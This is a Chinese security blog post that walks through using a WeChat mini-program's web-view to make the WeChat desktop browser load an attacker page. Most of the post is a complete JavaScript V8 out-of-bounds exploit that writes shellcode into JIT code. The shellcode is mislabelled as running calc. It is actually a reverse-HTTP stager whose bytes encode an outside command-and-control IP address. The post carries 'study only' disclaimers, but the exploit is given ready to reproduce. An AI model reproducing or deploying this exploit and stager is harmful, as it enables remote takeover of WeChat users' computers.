Wx最新版本上线cs绕过

  • A+
所属分类:安全文章

前言

标题写吸引人了点(别打我)。其实绕过也不算绕过,wx更新后只允许指定的域名使用内置浏览器(如公众号的:https://mp.weixin.qq.com)。wx小程序开发使用的语言为:WXML(WeiXinMark Language wx标记语言)、WXSS(WeiXinStyle Sheet wx样式表)、JS(JavaScript小程序的主体),需要以浏览器为基础运行,很多接口业务没法不使用内置浏览器,至于为什么不开启沙箱模式就超出认知了,有懂开发的大佬可以指教下。

注:本文仅提供学习思考方法,切勿进行恶意操作

正文

Shellcode还是原来的shellcode,只是换了个地方使用而已。考虑到有些朋友没有,我附在文末。

准备wx开发者工具:https://developers.weixin.qq.com/miniprogram/dev/devtools/download.html

第一步:创建小程序,AppID点击测试号

Wx最新版本上线cs绕过

第二步:编辑iindex.html,内容如下

<web-viewsrc="http://youdomain/"> </web-view>

这个链接你可以引用你云端其他地方的js引用,也可以写在小程序里面。我就比较懒,就直接用我之前测试的了。

Wx最新版本上线cs绕过

 

第三步:点击预览,选择启动PC端自动预览,过一会就会启动小程序了。

Wx最新版本上线cs绕过

当然,打开的时候会提示你域名有风险,不要点,我们只是测试,点击继续。

Wx最新版本上线cs绕过

直接上线,复现完成

Wx最新版本上线cs绕过

 

 

shellcode

ENABLE_LOG = true;IN_WORKER = true;
// run calc and hang in a loopvar shellcode = [ 0xfc0xe80x890x000x640x8b0x520x300x8b0x520x0c0x8b0x520x140x8b0x720x280x0f0xb70x4a0x260x310xff0x310xc00xac0x3c0x610x7c0x020x2c0x200xc10xcf0x0d0x010xc70xe20xf00x520x570x8b0x520x100x8b0x420x3c0x010xd00x8b0x400x780x850xc00x740x4a0x010xd00x500x8b0x480x180x8b0x580x200x010xd30xe30x3c0x490x8b0x340x8b0x010xd60x310xff0x310xc00xac0xc10xcf0x0d0x010xc70x380xe00x750xf40x030x7d0xf80x3b0x7d0x240x750xe20x580x8b0x580x240x010xd30x660x8b0x0c0x4b0x8b0x580x1c0x010xd30x8b0x040x8b0x010xd00x890x440x240x240x5b0x5b0x610x590x5a0x510xff0xe00x580x5f0x5a0x8b0x120xeb0x860x5d0x680x6e0x650x740x000x680x770x690x6e0x690x540x680x4c0x770x260x070xff0xd50xe80x000x000x000x000x310xff0x570x570x570x570x570x680x3a0x560x790xa70xff0xd50xe90xa40x000x000x000x5b0x310xc90x510x510x6a0x030x510x510x680xcb0x280x000x000x530x500x680x570x890x9f0xc60xff0xd50x500xe90x8c0x000x000x000x5b0x310xd20x520x680x000x320xc00x840x520x520x520x530x520x500x680xeb0x550x2e0x3b0xff0xd50x890xc60x830xc30x500x680x800x330x000x000x890xe00x6a0x040x500x6a0x1f0x560x680x750x460x9e0x860xff0xd50x5f0x310xff0x570x570x6a0xff0x530x560x680x2d0x060x180x7b0xff0xd50x850xc00x0f0x840xca0x010x000x000x310xff0x850xf60x740x040x890xf90xeb0x090x680xaa0xc50xe20x5d0xff0xd50x890xc10x680x450x210x5e0x310xff0xd50x310xff0x570x6a0x070x510x560x500x680xb70x570xe00x0b0xff0xd50xbf0x000x2f0x000x000x390xc70x750x070x580x500xe90x7b0xff0xff0xff0x310xff0xe90x910x010x000x000xe90xc90x010x000x000xe80x6f0xff0xff0xff0x2f0x720x610x310x580x000xe20x260x9e0x3e0x300xe80xbe0xf90x070x260x0c0xb70x290xcf0x9f0x0c0x710x330x420x560x550x840x120x2d0x720x240x7d0x1c0xc60xfe0x080x220xb50x2b0x9a0xcb0x7b0x3e0x850x070xb80xfc0xa40x880xe90xe90xae0x3f0x730xaf0xe00xca0x080x0b0x120x3a0xe90x740x310x190x8a0x580xa40xc50xfb0x900x800xd50xe80x040xbb0x710x2b0x000x550x730x650x720x2d0x410x670x650x6e0x740x3a0x200x4d0x6f0x7a0x690x6c0x6c0x610x2f0x340x2e0x300x200x280x630x6f0x6d0x700x610x740x690x620x6c0x650x3b0x200x4d0x530x490x450x200x370x2e0x300x3b0x200x570x690x6e0x640x6f0x770x730x200x4e0x540x200x350x2e0x310x3b0x200x2e0x4e0x450x540x200x430x4c0x520x200x320x2e0x300x2e0x350x300x370x320x370x290x0d0x0a0x000x5c0x060x710x870x720x720xb20x050x6b0x320x1e0xcf0x090x1a0x410x360xba0x6d0xe10x1e0xe20x4f0x330xc80x960xc00x8a0x6e0x3f0x340x890xbc0x440x4c0x530xf80xb40x8b0xe50x880x1b0x840x780x300xe70x1e0x1b0xde0xb80x2b0x500x770x170x3e0x150xb40x7a0x610x1c0xde0xb90x780x670x810x910x5f0x2a0x9b0x7a0x7a0xc40xd40x6d0xb40x690xdf0xa30xb80xf40x180x260x500x660x880xbd0xf70x5c0xfc0xb60xfd0xd20x630xe50x160x790x1a0x100x130xfa0x150xb80x960x580x5b0x7e0x1e0xd20xd90x4b0xe90xb60x4a0x580xa60x930x7f0xb60x410xc80xd60x2a0xb40x0b0x150xb90xb70xe60xef0xd60xca0xc70xf00x300xbd0xef0xcf0x2d0x630x610x030xf30x490x3b0x880x720x660x230x220xb80x910x8d0xb80xb20x4f0x210xaf0x930x5c0x5a0x670x120xb50xa70x060xa80xde0xf70xe50x410xca0x500x470xcc0x840xb90x6b0x050x090x830x1a0xa70xa10x3a0x030x750x600xf50xf40xba0x080x020x990x8e0xfa0xc80x720xf50xdc0x9b0x460xda0x5a0xbf0x1e0x130x110xf80xfa0x920x280x230x700xd00x790x960x190x8c0x380x000x680xf00xb50xa20x560xff0xd50x6a0x400x680x000x100x000x000x680x000x000x400x000x570x680x580xa40x530xe50xff0xd50x930xb90x000x000x000x000x010xd90x510x530x890xe70x570x680x000x200x000x000x530x560x680x120x960x890xe20xff0xd50x850xc00x740xc60x8b0x070x010xc30x850xc00x750xe50x580xc30xe80x890xfd0xff0xff0x340x350x2e0x310x390x350x2e0x310x350x330x2e0x310x390x390x000x6f0xaa0x510xc3 ];
function print(data) {}

var not_optimised_out = 0;var target_function = (function (value) {    if (value == 0xdecaf0) {        not_optimised_out += 1;    }    not_optimised_out += 1;    not_optimised_out |= 0xff;    not_optimised_out *= 12;});
for (var i = 0; i < 0x10000; ++i) {    target_function(i);}

var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;
function cb(flag) {    if (flag == true) {        return;    }    g_array = new Array(0);    g_array[0] = 0x1dbabe * 2;    return 'c01db33f';}
function gc() {    for (var i = 0; i < 0x10000; ++i) {        new String();    }}
function oobAccess() {    var this_ = this;    this.buffer = null;    this.buffer_view = null;
    this.page_buffer = null;    this.page_view = null;
    this.prevent_opt = [];
    var kSlotOffset = 0x1f;    var kBackingStoreOffset = 0xf;
    class LeakArrayBuffer extends ArrayBuffer {        constructor() {            super(0x1000);            this.slot = this;        }    }
    this.page_buffer = new LeakArrayBuffer();    this.page_view = new DataView(this.page_buffer);
    new RegExp({ toString: function () { return 'a' } });    cb(true);
    class DerivedBase extends RegExp {        constructor() {            // var array = null;            super(                // at this point, the 4-byte allocation for the JSRegExp `this` object                // has just happened.                {                    toString: cb                }, 'g'                // now the runtime JSRegExp constructor is called, corrupting the                // JSArray.            );
            // this allocation will now directly follow the FixedArray allocation            // made for `this.data`, which is where `array.elements` points to.            this_.buffer = new ArrayBuffer(0x80);            g_array[8] = this_.page_buffer;        }    }
    // try{    var derived_n = eval(`(function derived_n(i) {        if (i == 0) {            return DerivedBase;        }
        class DerivedN extends derived_n(i-1) {            constructor() {                super();                return;                ${"this.a=0;".repeat(tDerivedNCount)}            }        }
        return DerivedN;    })`);
    gc();

    new (derived_n(tDerivedNDepth))();
    this.buffer_view = new DataView(this.buffer);    this.leakPtr = function (obj) {        this.page_buffer.slot = obj;        return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);    }
    this.setPtr = function (addr) {        this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);    }
    this.read32 = function (addr) {        this.setPtr(addr);        return this.page_view.getUint32(0, true, ...this.prevent_opt);    }
    this.write32 = function (addr, value) {        this.setPtr(addr);        this.page_view.setUint32(0, value, true, ...this.prevent_opt);    }
    this.write8 = function (addr, value) {        this.setPtr(addr);        this.page_view.setUint8(0, value, ...this.prevent_opt);    }
    this.setBytes = function (addr, content) {        for (var i = 0; i < content.length; i++) {            this.write8(addr + i, content[i]);        }    }    return this;}
function trigger() {    var oob = oobAccess();
    var func_ptr = oob.leakPtr(target_function);    print('[*] target_function at 0x' + func_ptr.toString(16));
    var kCodeInsOffset = 0x1b;
    var code_addr = oob.read32(func_ptr + kCodeInsOffset);    print('[*] code_addr at 0x' + code_addr.toString(16));
    oob.setBytes(code_addr, shellcode);
    target_function(0);}
try{    print("start running");    trigger();}catch(e){    print(e);}

 

处置建议:
官方提示第三方域名比较危险,除非可信度非常高,不然不要点击,有些小程序被xss挂上恶意链接可能就会导致电脑被控

 

免责申明:

    本项目仅进行信息搜集,漏洞研究工作,无漏洞利用、攻击性行为,发文初衷为仅为方便安全人员学习交流。       请使用者遵守当地相关法律,勿用于非授权测试,勿用于非授权测试,勿用于非授权测试~~(重要的事情说三遍)~~,如作他用所承受的法律责任一概与凌晨安全无关!!!

 

 

本文始发于微信公众号(凌晨安全):Wx最新版本上线cs绕过

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: